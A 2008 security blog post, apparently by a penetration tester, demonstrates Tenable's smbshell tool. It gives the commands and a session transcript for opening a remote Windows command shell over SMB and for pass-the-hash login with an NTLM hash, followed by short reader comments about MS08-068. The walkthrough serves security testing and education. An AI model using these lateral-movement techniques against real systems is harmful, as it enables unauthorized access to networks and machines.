Tuesday, November 11, 2008

Passing the Hash and other fun with Tenable smbshell


Description

smbshell is a pre-compiled NASL script which can be used as a standalone tool to do the following tasks :
  • Navigate thru the remote SMB shares and download files or obtain their version number
  • Read/Enumerate the remote SMB registry
  • Query/Start/Stop/Pause remote services
  • Obtain an interactive shell (cmd.exe) on the remote host
http://cgi.tenablesecurity.com/tenable/smbshell.php

Installation

smbshell is a pre-compiled NASL script - therefore, you need to install Nessus 3 first.
To run smbshell, download it and run it thru the 'nasl' command-line utility :
$ /opt/nessus/bin/nasl -t TargetIP smbshell.nbin
Under Windows, you need to copy it under C:\Program Files\Tenable\Nessus\Plugins\Scripts\. Then you can do :
C:\> Program Files\Tenable\Nessus\nasl.exe -t TargetIP smbshell.nbin

Usage

cg@WPAD:~/evil/passthehashstuff$ /opt/nessus/bin/nasl -t 192.168.0.103 smbshell.nbin

--==[SMB Shell v0.3 (c) 2007 Tenable Network Security]==--

[*] username: smbshell
[*] password:
[*] domain (optional):
[*] Connecting to 192.168.0.103...
[*] Authenticating to 192.168.0.103...

smbshell> help

The following commands are supported :

help - the current screen
ftp - SMB ftp client
reg - registry browser
users - SMB users & groups browser
services - service manager
quit/exit - exit

smbshell>

oh and shell, shell is fun

shell
[*] Opening share ADMIN$...
[*] Connected to ADMIN$ (192.168.0.100:41095 -> 192.168.0.101:445)
[*] Installing remote command service...
[*] Remote command service installed.
[*] Connecting to remote command service...
[*] Connected to remote command service.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>echo woot
echo woot
woot

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Media State . . . . . . . . . . . : Media disconnected

Ethernet adapter Wireless Network Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1

C:\WINDOWS\system32>
C:\WINDOWS\system32>exit

[*] Removing remote command service...
[*] Remote command service removed.

Pass the Hash info
http://blog.tenablesecurity.com/2007/06/lmntlm-hash-sup.html

###########################################
--==[SMB Shell v0.3 (c) 2007 Tenable Network Security]==--
[*] username: administrator
[*] password: **Just hit enter here**
[*] hash: NTLM:78164FD1E988FE5B39E0474EEE475E51
[*] domain (optional):
[*] Connecting to 172.11.12.184...
[*] Authenticating to 172.11.12.184...

If you have no idea what nasl is
http://blog.tenablesecurity.com/2007/06/using-the-nasl-.html

Thanks to MC for bringing this up to me.

Lastly, If I see this shit in some "cutting edge hacker techniques" webcast without a mention of this post I'm gonna go off because this has been out for over two years...I'll leave it at that.
CG

3 comments:

Anonymous said...

A timely post; especially since MS just fixed this today (MS08-068).

It was first reported by CDC way back in 2001...it's about damn time. ;)

CG said...

actually looking at the MS08-068 report it fixes the SMB relay vulnerability.

With this tool you either have to have a password or a hash to log in, it doesnt reflect back any creds to do the logging in.

I dont think they'll be able to fix the pass the hash thing, you just have to keep the bad guys from getting those hashes.

Anonymous said...

Very nice.

A question: do these scripts work with you?

smb_accessible_shares.nasl, smb_blank_admin_password and smb_null_session.nasl scripts